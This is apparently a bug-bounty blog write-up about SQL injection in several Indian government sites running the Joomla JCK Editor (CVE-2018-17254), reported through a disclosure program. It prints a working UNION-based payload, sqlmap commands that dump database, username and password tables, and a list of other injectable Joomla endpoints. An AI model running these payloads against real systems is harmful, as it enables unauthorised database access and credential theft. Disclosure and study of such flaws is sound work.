.png)
4 months ago
27 BOOK THIS SPACE FOR AD
ARTICLE AD
Hello Hunters…….!!!! Hope you all are doing well..!!
Intro: I am p_ra_dee_p whom you all know as Professor0xx01. Today I am gonna to explain you my story about finding SQL Injection bugs in multiple Website reserved by our Indian Government. It’s going to be a much interesting story compared to all other stories. So, let’s jump into it.
BUG CVSS Score - 9.8 -: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. This can allow an attacker to view data that they are not normally able to retrieve. This might include data that belongs to other users, or any other data that the application can access.
In many cases, an attacker can modify or delete this data, causing persistent changes to the application’s content or behavior.
First Bug :: SQL Injection (CVE-2018–17254)
During the assessment of vulnerability disclosure program under NCIIPC, I found an URL which was belongs to “********** ******** ******** Agency” India. Sorry, it’s not disclosable publicly 🙂🙂!!
Note: I have already collected *.gov.in domains during my subdomain enumeration phase.
After a little bit enumeration, i found some juicy endpoint of JCK Editor component 6.4.4 .
Critical (9.8) : The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php ‘parent’ parameter.
The bug: “Joomla JCK Editor 6.4.4 — ‘parent’ SQL Injection”.
Seeing this, instantly i go to the browser & browsed the url with the payload according to CVEs . After browsing, as expected….., it’s worked !! I got the details about the database(), user(), version() …….!!!!
https://<target>.com/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aaThen i go through the CVE POC’s available in internet ,, but it’s not worked properly. Throwing me error whenever i am executing the code.
Then i think……………………
But after that, I have remembered the tool “SQLMAP” exists which might be able to do this job. Then I copied the url & start another pet “Sqlmap” with the vulnerable parameter “parent” which i have detected in the CVE Details early.
slqmap -u https://<target.com>/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=1" --batch -p parent --level 4 --risk 3 --dbsAnddddddd……!!! You can see here i dumped all the available databases under the target system.
I got a total no of 10 databases from the target system.
Now it’s time to extract data from the available databases. Then i have successfully dumped much sensitive data like “username” “password” “email” “name” “otpKey” etc. from MySQL Databases . As you can see below in the attached screenshot…………….!!
slqmap -u https://<target.com>/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=1" -p parent --batch --level 4 --risk 3 -D <database_name> -T <table_name> -C id,username,password,name --dumpSecond Bug :: SQL Injection — Same as the previous one but in another domain.
During further hunting onto another websites, i have also detected this same bug as following the same techniques i have already told….!!!
https://<target2>.com/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aaI browsed it and getting the same type of information as the previous one.
Sooooo,,, why wasting time….??????? (it’s 02:39 a.m at night when i find it)
I handovered it to “sqlmap” & it extracted available databases & corresponding data Successfully. Here i also got the super User’s username as well as the password from the data tables.
slqmap -u https://<target2.com>/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=1" -p parent --batch --level 4 --risk 3 -D <database_name> -T <table_name> -C id,username,password,name --dumpThird One :: SQL Injection — Same as the previous two.. ; but in another domain.
I browsed it and got the same type of information as the previous two .
Sooooo,,, after getting it, I swapped this with the Sqlmap & it extracted available databases & corresponding data Successfully. Here i also got the super User’s username, Test username, emails of this accounts as well as the password from the data tables.
The next day i started again & compromised another 8+ websites databases within few hours < & made my job done.
Then I made an instant reports about my findings of this CRITICAL Severity Issues & send it to the NCIIPC Team.
They appreciated my work & acknowledged me for my findings !!
Discovered Endpoints For Sqli:
1.https://<target>.in/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=**<sql payload here>**2.https://target>.in/index.php?option=com_contenthistory&view=history
&list[ordering]&item_id=1&type_id=1&list[select]=**<sql payload here>**
3.“https://<atrget>.in/index.php?option=com_fields&view=fields&lay
out=modal&list[fullordering]=**<sql payload here>**
That’s it for this article now :) !! Hope you guys all enjoyed it..!!
If you like it, don’t forget to clap & follow me for more insightful articles ..!! 😊🎖️
THANKS FOR READING !!
Happy Hunting ~~
Keep learning & keep securing ~~
Bengali (Bangladesh) · 
English (United States) ·